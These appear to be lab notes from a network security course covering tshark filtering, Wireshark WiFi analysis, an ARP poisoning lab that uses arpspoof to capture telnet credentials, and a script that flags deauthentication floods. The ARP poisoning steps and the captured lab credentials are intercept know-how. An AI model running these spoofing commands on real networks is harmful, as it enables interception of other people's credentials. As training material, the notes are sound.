🔬 Tshark, ARP, WiFi
Lab 1
Tshark usage

Check the Tshark version:
tshark -v
TShark (Wireshark) 2.6.1 (Git v2.6.1 packaged as 2.6.1-0ubuntu2~16.04.0)
📌 Running Tshark version is 2.6.1

List all supported network interfaces for monitoring:
tshark -D

Sniff some traffic on eth0:
tshark -i eth0
📌 studentuser doesn't have permission to capture on the eth0 interface

Display the packet list of the .pcap file:
tshark -r HTTP_traffic.pcap

Count the output lines of the .pcap file to find the total number of packets:
tshark -r HTTP_traffic.pcap | wc -l
30418 # lines in the file

Read the first 100 packets from the .pcap file:
tshark -r HTTP_traffic.pcap -c 100

List the Protocol Hierarchy Statistics from the .pcap file:
tshark -r HTTP_traffic.pcap -z io,phs -q
Lab 2
Tshark usage and filtering
Filtering
Show the HTTP traffic from a .pcap file:
tshark -r HTTP_traffic.pcap -Y 'http'
tshark -r HTTP_traffic.pcap -Y 'http' | more

Show only the IP packets sent from IP address 192.168.252.128 to IP address 52.32.74.91:
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"

Print only packets containing GET requests:
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"

Print only the frame time, source IP and URL for all GET requests:
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri

Print packets containing a string:
tshark -r HTTP_traffic.pcap -Y "http contains password"
📌 4 HTTP packets contain the password string

Check the destination IP for GET requests sent to www.nytimes.com:
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst
📌 170.149.159.130 is the destination IP of www.nytimes.com

Check the session ID used by 192.168.252.128 for amazon.in:
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie
📌 278-7381968-4337153 is the session ID

Find the OS type of the machine with IP 192.168.252.128:
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent
Use the User-Agent string to find the specific distribution:
Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
📌 The OS is Linux x86_64; rv:31.0 (looked up on user-agents.net)
Lab 3 - ARP Poisoning
🔬 INE Platform Lab
ARP Poisoning attack against a telnet server. The client machine authenticates with the telnet server every 30 sec. Find the telnet login credentials.
Tools: arpspoof & Wireshark

Monitor the traffic on the eth1 interface of the Kali Attacker machine.
ip -br -c a
eth1 UP 10.100.13.140/24

Enumeration
nmap 10.100.13.0/24
Nmap scan report for 10.100.13.1
22/tcp open ssh
3389/tcp open ms-wbt-server
# ^^ Gateway machine, do not attack
Nmap scan report for 10.100.13.36
22/tcp open ssh
23/tcp open telnet
# ^^ Telnet server machine
Nmap scan report for 10.100.13.140
3389/tcp open ms-wbt-server
5910/tcp open cm
# ^^ Client machine

ARP Poisoning Attack
To see the traffic of other machines, configure the Kali Attacker VM to forward IP packets:
echo 1 > /proc/sys/net/ipv4/ip_forward

Start the ARP poisoning attack with the arpspoof tool:
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
# -t = target
# -r = poison both directions (target and host); the last argument is the host
Open Wireshark, start capturing eth1 traffic and apply the telnet filter.

Follow the TCP stream and find the telnet credentials. Stop the capture and the arpspoof tool.

📌 Telnet credentials are admin:MyS3cr3tP455
telnet 10.100.13.36
Lab 4 - WiFi Traffic Analysis
🔬 WiFi Security: Traffic Analysis I
WiFi basic traffic analysis with Wireshark

Find the name of the Open SSID in the packet dump, using the filter below.
Beacon frame = 0x0008
Wlan tag 48 = RSN-IE (Robust Security Network Information Element)
(wlan.fc.type_subtype == 0x0008) && (!(wlan.wfa.ie.wpa.version == 1)) && !(wlan.tag.number == 48)

Find the channel Home_Network is operating on:
wlan contains Home_Network

Find which security mechanism the LazyArtists SSID uses:
wlan contains LazyArtists

Check the WPS setup for the Amazon Wood SSID:
(wlan.ssid contains "Amazon") && (wlan.fc.type_subtype == 0x0008)
📌 WPS is enabled

Count the packets of the device with MAC e8:de:27:16:87:18.
wlan.ta = transmitter address
wlan.ra = receiver address
(wlan.ta == e8:de:27:16:87:18) || (wlan.ra == e8:de:27:16:87:18)

Find a specific MAC address which exchanges data with the SecurityTube_Open SSID. SecurityTube_Open is hosted on BSSID e8:de:27:16:87:18.
(wlan.bssid == e8:de:27:16:87:18) && (wlan.fc.type_subtype == 0x0020)

Find the TSF timestamp of the Association Response sent from the SecurityTube_Open access point to a station:
((wlan.bssid == e8:de:27:16:87:18) && (wlan.addr==5c:51:88:31:a0:3b)) && (wlan.fc.type_subtype == 0x0001)
Lab 5 - WiFi Traffic Filtering
Tshark usage and filtering
Show only WiFi traffic:
tshark -r WiFi_traffic.pcap -Y "wlan"

Show only the deauthentication packets.
Every management frame in WiFi can be classified under a type and subtype.
wlan.fc.type_subtype == 0x000c - deauthentication frames (sent by the AP)
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"

Show only the WPA handshake packets. EAPoL (Extensible Authentication Protocol over LAN) is used for the WPA handshake.
tshark -r WiFi_traffic.pcap -Y "eapol"

Show only the SSID and BSSID values of all beacon frames:
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid

Check the BSSID of the LazyArtists SSID:
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid
📌 LazyArtists BSSID is fc:b0:c4:91:71:e0.

Show the channel on which Home_Network operates:
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel
📌 Home_Network operating channel is 6.

Show the two devices that received the deauth messages:
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra
📌 The MAC addresses of the two devices are 6c:19:8f:5f:81:74 and bc:ae:c5:c3:5e:01.

Check the vendor and model of the device with MAC 5c:51:88:31:a0:3b:
tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent
📌 The device is a Motorola MotoG3.
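The deauth filter above lists who received deauthentication frames; turning that into a detection means counting them per receiver over time. Added example, not part of the lab notes: the script assumes a field export produced by the tshark command in the comment; the timestamps and frame counts are constructed, while the MAC addresses are the ones found in the lab capture.

```shell
#!/bin/sh
# Constructed sample (times and frame count made up; MACs are the ones found in the
# lab capture above) of the output of
#   tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" \
#          -T fields -e frame.time_epoch -e wlan.ta -e wlan.ra
# i.e. "<epoch time> <transmitter> <receiver>" per deauthentication frame.
DEAUTH_SAMPLE=$(printf '%s\n' \
  '1500000000.10 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.12 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.15 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.18 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.21 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.24 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.27 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000000.30 fc:b0:c4:91:71:e0 6c:19:8f:5f:81:74' \
  '1500000003.00 fc:b0:c4:91:71:e0 bc:ae:c5:c3:5e:01')

# deauth_report MIN_FRAMES WINDOW_SECONDS
# Reads the field output from stdin and prints one line per receiver:
#   <receiver> <deauth count> <seconds between first and last> <FLOOD|ok>
# A receiver is flagged FLOOD when it got at least MIN_FRAMES deauth frames
# within WINDOW_SECONDS. A single deauth is normal AP housekeeping; a burst is not.
deauth_report() {
    awk -v min="$1" -v win="$2" '
        NF == 3 {
            ra = $3; n[ra]++
            if (!(ra in first) || $1 < first[ra]) first[ra] = $1
            if (!(ra in last)  || $1 > last[ra])  last[ra]  = $1
        }
        END {
            for (ra in n) {
                span = last[ra] - first[ra]
                verdict = (n[ra] >= min && span <= win) ? "FLOOD" : "ok"
                printf "%s %d %.2f %s\n", ra, n[ra], span, verdict
            }
        }' | sort
}

printf '%s\n' "$DEAUTH_SAMPLE" | deauth_report 5 2
```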